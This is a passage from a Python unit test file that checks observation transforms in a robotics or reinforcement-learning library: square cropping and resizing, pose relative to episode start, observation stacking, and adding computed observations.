output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=1.,
x_offset_relative=1.5,
y_offset_relative=0.)
class CropSquareAndResizeTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
    # This has a shape of (4, 5).
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
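  # As the cases below suggest (an inference from the tests, not library
  # documentation): CropSquareAndResize takes a square crop whose side is
  # crop_width_relative times the source width, then resizes it to
  # side_length_pixels with the given cv2 interpolation.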
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:4, :4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testScaledCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=8,
x_offset_relative=0.0,
y_offset_relative=0.0,
interpolation=cv2.INTER_NEAREST)
# Nearest neighbor sampling should just duplicate the original pixels
expected_value = np.repeat(
np.repeat(self._input_obs_value[:4, :4], 2, axis=0), 2, axis=1)
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
class PoseRelativeTest(absltest.TestCase):
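  # As exercised below, PoseRelativeToEpisodeStart re-expresses the pos and
  # quat observations relative to their values at the episode's FIRST
  # timestep, so the first processed step reads as zero translation and
  # identity rotation.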
def _check_spec_float_unchanged(self, dtype):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=dtype, name='pos'),
'quat': specs.Array(shape=(4,), dtype=dtype, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
def test_spec_float32_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float32)
def test_spec_float64_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float64)
def test_initial_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': [1.0, -1.5, 3.2],
'quat': tr.euler_to_quat([0.1, 0.2, 0.3])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.FIRST, observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, [0., 0., 0.])
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0., 0., 0.])

  def test_relative_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
    # Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2]),
'quat': tr.euler_to_quat([0.0, 0.0, 0.0])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation=input_obs)
preprocessor.setup_io_spec(input_spec)
preprocessor.process(first_input_timestep)
pos_offset = np.array([0.1, -0.2, -0.3])
input_obs = {
'pos': (input_obs['pos'] + pos_offset),
'quat': tr.euler_to_quat([0.2, 0.0, 0.0])
}
second_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.MID,
observation=input_obs)
output_timestep = preprocessor.process(second_input_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, pos_offset)
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0.2, 0., 0.])
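

# For reference, one formulation of the relative-pose math that these tests
# are consistent with (a sketch under that assumption, not necessarily the
# exact implementation in observation_transforms): the FIRST-step pose is
# stored, and later steps report their pose relative to it, e.g.
#
#   rel_pos = pos - initial_pos
#   rel_quat = tr.quat_mul(tr.quat_inv(initial_quat), quat)
#
# With an identity initial_quat, as in test_relative_observations, the
# relative quaternion reduces to the current quaternion.

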
class StackObservationsTest(parameterized.TestCase):
@parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
def test_stack_observations_spec(
self, add_leading_dim, input_shape, output_shape):
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
# Generate the expected stacked output spec.
expected_output_obs_spec = {
'pos': specs.Array(shape=output_shape, dtype=np.float32, name='pos'),
}
expected_output_spec = _build_unit_timestep_spec(
observation_spec=expected_output_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(expected_output_spec, output_spec)

  @parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
  def test_stack_observations(
      self, add_leading_dim, input_shape, output_shape):
# Generate the input spec.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
preprocessor.setup_io_spec(input_spec)
input_pos = np.random.random(input_shape).astype(np.float32)
if add_leading_dim:
expected_output_pos = np.stack([input_pos for _ in range(3)], axis=0)
else:
expected_output_pos = np.concatenate(
[input_pos for _ in range(3)], axis=0)
input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation={'pos': input_pos,})
output_timestep = preprocessor.process(input_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_allclose(expected_output_pos, output_pos)
    self.assertEqual(output_pos.shape, output_shape)
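

# The two stacking modes checked above, as a standalone sketch for a single
# array `obs` and stack_depth=3; the first yields shape (3,) + obs.shape, the
# second multiplies the leading dimension by 3:
#
#   np.stack([obs] * 3, axis=0)        # add_leading_dim=True
#   np.concatenate([obs] * 3, axis=0)  # add_leading_dim=False

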
class AddObservationTest(absltest.TestCase):
def test_no_overwriting(self):
preprocessor = observation_transforms.AddObservation(
obs_name='pos',
obs_callable=lambda _: [1., 1., 1.])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
error_msg = 'Observation pos already exists.'
with self.assertRaisesWithLiteralMatch(ValueError, error_msg):
preprocessor.setup_io_spec(input_spec)

  def test_fail_to_run_obs_callable(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda timestep: timestep.observation['not_exist'])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
    # The obs_callable tries to read an observation named `not_exist` that is
    # not present in the input timestep.
with self.assertRaisesRegex(KeyError, 'not_exist'):
preprocessor.setup_io_spec(input_spec)

  def test_add_obs_correctly(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda _: np.asarray([1., 1., 1.], dtype=np.float32))
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
    # Set up the expected output specs.
expected_observation_spec = input_obs_spec.copy()
    expected_observation_spec['new_obs'] = (
        specs.Array(shape=(3,), dtype=np.float32, name='new_obs'))
expected_output_spec = copy.deepcopy(input_spec)
# Check the specs.
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])

  def test_add_obs_correctly_with_provided_specs(self):
new_obs_spec = specs.BoundedArray(
shape=(3,), dtype=np.int32, minimum=-1, maximum=3, name='new_obs')
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda _: np.array([1, 1, 1], dtype=np.int32),
obs_spec=new_obs_spec)
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
    # Set up the expected specs.
expected_observation_spec = dict(input_obs_spec)
expected_observation_spec['new_obs'] = new_obs_spec
expected_output_spec = copy.deepcopy(input_spec)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])
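

# A hedged usage sketch for AddObservation outside of these tests; the
# observation names `gripper_open` and `gripper_pos` are hypothetical. The
# obs_callable receives the input timestep and returns the new value:
#
#   add_gripper_open = observation_transforms.AddObservation(
#       obs_name='gripper_open',  # hypothetical name
#       obs_callable=lambda ts: np.asarray(
#           [float(ts.observation['gripper_pos'][0] > 0.04)],  # hypothetical
#           dtype=np.float32))

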
def _build_unit_timestep_spec(
observation_spec: Optional[Mapping[str, specs.Array]] = None,
reward_spec: Optional[specs.Array] = None,
discount_spec: Optional[specs.BoundedArray] = None):
if observation_spec is None:
name = 'foo'
observation_spec = {
name: specs.Array(shape=(2,), dtype=_DEFAULT_TYPE, name=name),
}
if reward_spec is None:
reward_spec = scalar_array_spec(name='reward')
if discount_spec is None:
discount_spec = scalar_array_spec(name='discount')
return spec_utils.TimeStepSpec(
observation_spec=observation_spec,
reward_spec=reward_spec,
discount_spec=discount_spec)
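

# Example: with no arguments, _build_unit_timestep_spec() yields a spec with a
# single 'foo' observation of shape (2,) and dtype _DEFAULT_TYPE, plus scalar
# 'reward' and 'discount' specs; the StackObservations tests above rely on
# these defaults for the non-observation parts of the spec.

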
if __name__ == '__main__':
absltest.main()